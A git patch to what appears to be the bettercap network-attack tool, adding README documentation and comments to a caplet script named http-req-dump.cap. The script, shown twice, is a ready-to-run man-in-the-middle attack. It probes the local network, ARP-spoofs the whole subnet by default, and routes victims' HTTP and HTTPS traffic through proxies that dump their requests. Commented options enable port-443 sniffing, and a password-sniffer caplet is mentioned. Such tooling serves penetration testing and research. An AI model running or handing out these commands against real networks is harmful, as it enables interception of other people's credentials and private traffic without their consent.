From a1d96165cf63ec6c6714ccc728a3b7b78a6c17c4 Mon Sep 17 00:00:00 2001 From: evilsocket Date: Sat, 27 Jan 2018 21:19:04 +0100 Subject: [PATCH] balls --- README.md | 34 ++++++++++++++++++++++++++++++++++ caplets/http-req-dump.cap | 6 +++++- 2 files changed, 39 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index bf7ff868..73f4c584 100644 --- a/README.md +++ b/README.md @@ -130,6 +130,40 @@ You can have module specific help by using `help module-name` (for instance try Interactive sessions can be scripted with `.cap` files, or `caplets`, the following are a few basic examples, look the `caplets` folder for more. +#### caplets/http-req-dump.cap + +Execute an ARP spoofing attack on the whole network (by default) or on a host (using `-eval` as described), intercept HTTP and HTTPS requests with the `http.proxy` and `https.proxy` modules and dump them using the `http-req-dump.js` proxy script. + +```sh +# targeting the whole subnet by default, to make it selective: +# +# sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64" + +# to make it less verbose +# events.stream off + +# discover a few hosts +net.probe on +sleep 1 +net.probe off + +# uncomment to enable sniffing too +# set net.sniff.verbose false +# set net.sniff.local true +# set net.sniff.filter tcp port 443 +# net.sniff on + +# we'll use this proxy script to dump requests +set https.proxy.script caplets/http-req-dump.js +set http.proxy.script caplets/http-req-dump.js +clear + +# go ^_^ +http.proxy on +https.proxy on +arp.spoof on +``` + #### caplets/simple-password-sniffer.cap Simple password sniffer. diff --git a/caplets/http-req-dump.cap b/caplets/http-req-dump.cap index 40c3fdb3..f95beaef 100644 --- a/caplets/http-req-dump.cap +++ b/caplets/http-req-dump.cap @@ -2,22 +2,26 @@ # # sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64" +# to make it less verbose # events.stream off +# discover a few hosts net.probe on sleep 1 net.probe off +# uncomment to enable sniffing too # set net.sniff.verbose false # set net.sniff.local true # set net.sniff.filter tcp port 443 # net.sniff on +# we'll use this proxy script to dump requests set https.proxy.script caplets/http-req-dump.js set http.proxy.script caplets/http-req-dump.js clear +# go ^_^ http.proxy on https.proxy on arp.spoof on -